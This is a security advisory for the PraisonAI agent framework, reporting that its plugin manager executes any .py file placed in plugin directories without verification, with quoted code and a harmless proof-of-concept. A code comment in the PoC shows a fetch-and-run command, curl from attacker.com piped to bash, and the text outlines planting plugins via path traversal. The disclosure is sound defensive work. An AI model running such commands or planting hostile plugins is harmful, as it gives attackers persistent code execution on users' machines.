Vulnerability GHSA-m6wp-h223-4c8g

High Risk
HIGH RISK
CVSS Score: 8.4
Score Range: 7.0–8.9
High severity vulnerabilities (CVSS 7.0–8.9). Serious vulnerabilities that should be prioritized soon after critical fixes.
6 hours ago
October 08, 2026 at 04:44 PM UTC
PraisonAI: Plugin Auto-Discovery Executes Arbitrary Python Files Without Verification
0.0.1 - 1.6.77
0.0.1 - 1.6.77

Summary

PraisonAI: Plugin Auto-Discovery Executes Arbitrary Python Files Without Verification

Details

Summary

The plugin manager loads and executes arbitrary .py files from .praisonai/plugins/ directories (both project-level and user home) via importlib.util.spec_from_file_location() + exec_module() with zero code signing, integrity verification, or sandboxing. Any attacker who can write a file to the plugins directory (via path traversal, supply chain attack, or compromised dependency) achieves arbitrary code execution when the plugin system initializes.

Details

src/praisonai-agents/praisonaiagents/plugins/manager.py (lines 163-196):

def _load_plugin_file(self, file_path: Path) -> Optional[Plugin]:
    module_name = f"praison_plugin_{file_path.stem}_{id(file_path)}"
    spec = importlib.util.spec_from_file_location(module_name, file_path)
    module = importlib.util.module_from_spec(spec)
    sys.modules[module_name] = module
    spec.loader.exec_module(module)  # Executes arbitrary Python code

    if hasattr(module, "create_plugin"):
        return module.create_plugin()  # Calls arbitrary function

src/praisonai-agents/praisonaiagents/plugins/discovery.py (lines 38-39):

# Auto-discovery paths:
# 1. Project: ./.praisonai/plugins/
# 2. User: ~/.praisonai/plugins/

No code signing, hash verification, or sandboxing is applied. The only validation is checking for a Plugin Name field in the file's docstring header.

PoC

from praisonaiagents.plugins.discovery import load_plugin
import tempfile, os

# Create a "malicious" plugin
test_dir = tempfile.mkdtemp()
plugin_file = os.path.join(test_dir, 'evil.py')
with open(plugin_file, 'w') as f:
    f.write('"""\nPlugin Name: Evil Plugin\nDescription: test\nVersion: 1.0.0\n"""\n'
            'PROOF = "CODE_EXECUTED_AT_IMPORT_TIME"\n'
            '# In a real attack: os.system("curl attacker.com/shell.sh | bash")\n'
            'def create_plugin():\n    return {"name": "evil"}\n')

# Load it
result = load_plugin(plugin_file)
print(f"Result: {result}")  # {'name': 'Evil Plugin', ...}

# Verify code executed
import sys
for name, mod in sys.modules.items():
    if 'evil' in name:
        print(f"EXPLOIT CONFIRMED: {mod.PROOF}")  # "CODE_EXECUTED_AT_IMPORT_TIME"

Tested result: Plugin file was loaded via exec_module(), and the PROOF variable confirmed code execution at import time.

Impact

  • Arbitrary code execution: Any .py file in the plugins directory is executed with full Python access
  • No user interaction required: Plugins are auto-discovered and loaded at framework initialization
  • Persistence: A planted plugin survives restarts and executes every time the framework starts
  • Attack chain: Combine with path traversal (write_file tool) to plant the plugin remotely

Impacted packages

Timeline

Published
6 hours ago
October 08, 2026 at 04:44 PM UTC
Fixed (1.6.78)
3 months ago
June 25, 2026 at 08:19 AM UTC
Last Modified
6 hours ago
October 08, 2026 at 05:00 PM UTC